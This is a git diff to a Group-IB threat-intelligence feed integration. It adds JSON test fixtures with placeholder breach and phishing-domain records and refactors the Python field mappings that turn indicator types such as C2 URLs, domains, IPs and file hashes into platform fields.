[\"CD91C480FDE9D7ACB8AC4B78310EA2ED\", \"1390DDDFA28AE085D23518A035707231\"], \"updateTime\": \"2021-06-12T03:02:00\", \"uploadTime\": \"2021-06-12T03:02:00\", \"name\": \"Data Breach: some@gmail.com\", \"gibType\": \"compromised/breached\", \"relatedIndicatorsData\": [], \"systemSeverity\": 0}" - } - ] - ], - "bp/domain": [ - { - "last_fetch": { - "bp/domain": 3684188313 - } - }, - [ - { - "name": "Phishing Domain: some.ru", - "occurred": "2016-07-19T20:04:01Z", - "rawJSON": "{\"id\": 14940404, \"ts_create\": \"2016-07-19 20:04:01\", \"ts_update\": \"2021-01-01 00:35:46\", \"attrs\": {\"domain\": \"some.ru\", \"date_registered\": null, \"date_expired\": null, \"tld\": \"de\", \"detection_rate\": \"0/68\", \"name_server\": [\"Server\"], \"person\": \"Person\", \"address\": \"Address\", \"phone\": \"Phone\", \"organization\": null, \"registrar\": null, \"page_title\": \"Title\", 
\"email\": \"some@gmail.com\", \"favicon_md5\": \"38f5f976255a663bced929bb3c252880\", \"status\": \"Status\", \"type\": \"Type\", \"server_ip\": \"11.11.11.11\", \"server_ip_asn\": \"ASN\", \"server_ip_city\": \"City\", \"server_ip_country_code\": \"Code\", \"server_ip_country_name\": \"Country\", \"server_ip_provider\": \"Provider\", \"server_ip_region\": \"Region\", \"ip_history\": [], \"keywords\": [\"keywords\"], \"history\": [], \"screenshot\": \"https://bt.group-ib.com/?module=brand_domain_screenshot&action=data&id=14940404\", \"html\": \"https://bt.group-ib.com/?module=brand_domain_html&action=download&id=14940404\", \"favicon\": \"https://bt.group-ib.com/?module=brand_domain_favicon&action=data&id=14940404\"}, \"name\": \"Phishing Domain: some.ru\", \"gibType\": \"bp/domain\", \"relatedIndicatorsData\": [\"some.ru\", \"11.11.11.11\"], \"systemSeverity\": 0}" - } - ] - ] -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json new file mode 100644 index 000000000000..01fdb4c10265 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json 
@@ -0,0 +1,42 @@
+[
+ {
+ "apiPath": "suspicious_ip/scanner",
+ "label": "Suspicious IP :: Scanners",
+ "link": "https://tap.group-ib.com/api/v2/suspicious_ip/scanner?q=ip:8.8.8.8",
+ "count": 1,
+ "time": 0.29085319,
+ "detailedLinks": null
+ },
+ {
+ "apiPath": "attacks/deface",
+ "label": "Attack :: Deface",
+ "link": "https://tap.group-ib.com/api/v2/attacks/deface?q=ip:8.8.8.8",
+ "count": 1,
+ "time": 0.406312784,
+ "detailedLinks": null
+ },
+ {
+ "apiPath": "osi/public_leak",
+ "label": "Compromise & leaks :: Public Leaks",
+ "link": "https://tap.group-ib.com/api/v2/osi/public_leak?q=ip:8.8.8.8",
+ "count": 21847,
+ "time": 0.429146568,
+ "detailedLinks": null
+ },
+ {
+ "apiPath": "suspicious_ip/open_proxy",
+ "label": "Suspicious IP :: Open Proxy",
+ "link": "https://tap.group-ib.com/api/v2/suspicious_ip/open_proxy?q=ip:8.8.8.8",
+ "count": 17,
+ "time": 0.522133669,
+ "detailedLinks": null
+ },
+ {
+ "apiPath": "malware/config",
+ "label": "Malware/Source",
+ "link": "https://tap.group-ib.com/api/v2/malware/config?q=ip:8.8.8.8",
+ "count": 20,
+ "time": 0.655176984,
+ "detailedLinks": null
+ }
+]
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
index 57750a977f68..9b8c283e3874 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py
@@ -1,481 +1,854 @@ - -""" IMPORTS """ import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * -from collections.abc import Generator -import dateparser -import urllib3 -from requests.auth import HTTPBasicAuth - -# Disable insecure warnings -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) -''' CONSTANTS ''' -DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' -# todo: add all necessary field types -COMMON_FIELD_TYPES = ['trafficlightprotocol'] -DATE_FIELDS_LIST = ["creationdate", "firstseenbysource", "lastseenbysource", "gibdatecompromised"] -IP_COMMON_FIELD_TYPES = ['asn', 'geocountry', 'geolocation'] - -EVALUATION_FIELDS = ['evaluation.reliability', 'evaluation.credibility', - 'evaluation.admiraltyCode', 'evaluation.severity'] -EVALUATION_FIELD_TYPES = ['gibreliability', 'gibcredibility', 'gibadmiraltycode', 'gibseverity'] - -MALWARE_FIELDS = ['malware.name'] -MALWARE_FIELD_TYPES = ['gibmalwarename'] +""" IMPORTS """ -THREAT_ACTOR_FIELDS = ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'] -THREAT_ACTOR_FIELD_TYPES = ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'] +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations import TIPoller +from traceback import format_exc -MAPPING: dict = { - "compromised/mule": { - "indicators": - [ - { - "main_field": 'account', "main_field_type": 'GIB Compromised Mule', - "add_fields": [ - 'dateAdd', 'sourceType', *MALWARE_FIELDS, - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'source', *MALWARE_FIELD_TYPES, - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - 
"main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) + +""" CONSTANTS """ +DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ" + + +COMMON_MAPPING = { + "compromised/account_group": { + "types": { + "event_url": "URL", + "event_domain": "Domain", + "events_ipv4_ip": "IP", + "service_url": "URL", + }, + "add_fields_types": { + "event_url": { + "id": "gibid", + }, + "event_domain": { + "id": "gibid", + }, + "events_ipv4_ip": { + "id": "gibid", + "asn": "asn", + "country_name": "geocountry", + "region": "geolocation", + }, + "service_url": { + "id": "gibid", + }, + }, + "parser_mapping": { + "id": "id", + "event_url": "events.cnc.url", + "event_domain": "events.cnc.domain", + "events_ipv4_ip": "events.cnc.ipv4.ip", + "asn": "events.client.ipv4.asn", + "country_name": "events.client.ipv4.countryName", + "region": "events.client.ipv4.region", + "service_url": "service.url", + }, }, - "compromised/imei": { - "indicators": - [ - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, 
*EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'device.imei', "main_field_type": 'GIB Compromised IMEI', - "add_fields": [ - 'dateDetected', 'dateCompromised', 'device.model', - 'client.ipv4.asn', 'client.ipv4.countryName', 'client.ipv4.region', 'client.ipv4.ip', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'gibdatecompromised', 'devicemodel', *IP_COMMON_FIELD_TYPES, 'ipaddress', - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] + "compromised/bank_card_group": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": { + "id": "gibid", + }, + "cnc_domain": { + "id": "gibid", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + }, + }, + "parser_mapping": { + "id": "id", + "cnc_url": "events.cnc.url", + "cnc_domain": "events.cnc.domain", + "cnc_ipv4_ip": "events.cnc.ipv4.ip", + "cnc_ipv4_asn": "events.cnc.ipv4.asn", + "cnc_ipv4_country_name": "events.cnc.ipv4.countryName", + "cnc_ipv4_region": "events.cnc.ipv4.region", + }, + }, + "compromised/mule": { + "types": { + "account": "GIB Compromised Mule", + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "account": { + "id": "gibid", + "date_add": "creationdate", + "source_type": "source", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + 
"evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_url": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_domain": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "account": "account", + "date_add": "dateAdd", + "source_type": "sourceType", + "malware_name": "malware.name", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "cnc_url": "cnc.url", + 
"cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, "attacks/ddos": { - "indicators": - [ - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd', - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd', - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd' - - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, - *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'target.ipv4.ip', "main_field_type": 'GIB Victim IP', - "add_fields": [ - 'target.ipv4.asn', 'target.ipv4.countryName', 'target.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, - 'dateBegin', 'dateEnd', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + "target_ipv4_ip": "GIB Victim IP", + }, + "add_fields_types": { + "cnc_url": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": 
"gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "cnc_domain": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "target_ipv4_ip": { + "id": "gibid", + "target_ipv4_asn": "asn", + "target_ipv4_country_name": "geocountry", + "target_ipv4_region": "geolocation", + "malware_name": "malware.name", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "malware_name": 
"malware.name", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "date_begin": "dateBegin", + "date_end": "dateEnd", + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + "target_ipv4_ip": "target.ipv4.ip", + "target_ipv4_asn": "target.ipv4.asn", + "target_ipv4_country_name": "target.ipv4.countryName", + "target_ipv4_region": "target.ipv4.region", + }, }, "attacks/deface": { - "indicators": - [ - { - "main_field": 'url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'targetDomain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'targetIp.ip', "main_field_type": 'IP', - "add_fields": [ - 'targetIp.asn', 'targetIp.countryName', 'targetIp.region', - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] - }, - "attacks/phishing": { - "indicators": - [ - { - "main_field": 'url', "main_field_type": 'URL', - "add_fields": [ - 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'phishingDomain.domain', "main_field_type": 'Domain', - "add_fields": [ - 'phishingDomain.dateRegistered', 'dateDetected', 'phishingDomain.registrar', - 
'phishingDomain.title', 'targetBrand', 'targetCategory', 'targetDomain', - 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'firstseenbysource', 'registrarname', - 'gibphishingtitle', 'gibtargetbrand', 'gibtargetcategory', 'gibtargetdomain', - 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": {"url": "URL", "target_domain": "Domain", "target_ip_ip": "IP"}, + "add_fields_types": { + "url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "target_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "target_ip_ip": { + "id": "gibid", + "target_ip_asn": "asn", + "target_ip_country_name": "geocountry", + "target_ip_region": "geolocation", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "target_domain": "targetDomain", + "target_ip_ip": "targetIp.ip", + "target_ip_asn": 
"targetIp.asn", + "target_ip_country_name": "targetIp.countryName", + "target_ip_region": "targetIp.region", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "attacks/phishing_kit": { - "indicators": - [ - { - "main_field": 'emails', "main_field_type": 'Email', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "emails": "Email", + }, + "add_fields_types": { + "emails": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "emails": "emails", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "attacks/phishing_group": { + "types": { + "url": "URL", + "phishing_domain_domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + }, + "phishing_domain_domain": { + "id": "gibid", + "phishing_domain_registrar": "registrarname", + }, + "ipv4_ip": { + "id": "gibid", + "ipv4_country_name": "geocountry", + }, + }, + "parser_mapping": { + "id": "id", + "url": "phishing.url", + "phishing_domain_registrar": "domainInfo.registrar", + "ipv4_ip": "phishing.ip.ip", + "ipv4_country_mame": 
"phishing.ip.countryName", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "apt/threat": { - "indicators": - [ - { - "main_field": 'indicators.params.ipv4', "main_field_type": 'IP', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.hashes.md5', "main_field_type": 'File', - "add_fields": [ - 'indicators.params.name', 'indicators.params.hashes.md5', 'indicators.params.hashes.sha1', - 'indicators.params.hashes.sha256', 'indicators.params.size', - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibfilename', 'md5', 'sha1', 'sha256', 'size', - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "indicators_params_ipv4": "IP", + "indicators_params_domain": "Domain", + "indicators_params_url": "URL", + "indicators_params_hashes_md5": "File", + }, + "add_fields_types": { + 
"indicators_params_ipv4": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_hashes_md5": { + "id": "gibid", + "indicators_params_name": "gibfilename", + "indicators_params_hashes_md5": "md5", + "indicators_params_hashes_sha1": "sha1", + "indicators_params_hashes_sha256": "sha256", + "indicators_params_size": "size", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + 
"indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + }, + "parser_mapping": { + "id": "id", + "indicators_params_ipv4": "indicators.params.ipv4", + "indicators_params_domain": "indicators.params.domain", + "indicators_params_url": "indicators.params.url", + "indicators_params_hashes_md5": "indicators.params.hashes.md5", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "indicators_date_first_seen": "indicators.dateFirstSeen", + "indicators_date_last_seen": "indicators.dateLastSeen", + "indicators_params_name": "indicators.params.name", + "indicators_params_hashes_sha1": "indicators.params.hashes.sha1", + "indicators_params_hashes_sha256": "indicators.params.hashes.sha256", + "indicators_params_size": "indicators.params.size", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "malware_list_names": "malwareList.name", + }, }, "hi/threat": { - "indicators": - [ - { - "main_field": 'indicators.params.ipv4', "main_field_type": 'IP', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - 
"main_field": 'indicators.params.url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.hashes.md5', "main_field_type": 'File', - "add_fields": [ - 'indicators.params.name', 'indicators.params.hashes.md5', 'indicators.params.hashes.sha1', - 'indicators.params.hashes.sha256', 'indicators.params.size', - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibfilename', 'md5', 'sha1', 'sha256', 'size', - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "indicators_params_ipv4": "IP", + "indicators_params_domain": "Domain", + "indicators_params_url": "URL", + "indicators_params_hashes_md5": "File", + }, + "add_fields_types": { + "indicators_params_ipv4": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": 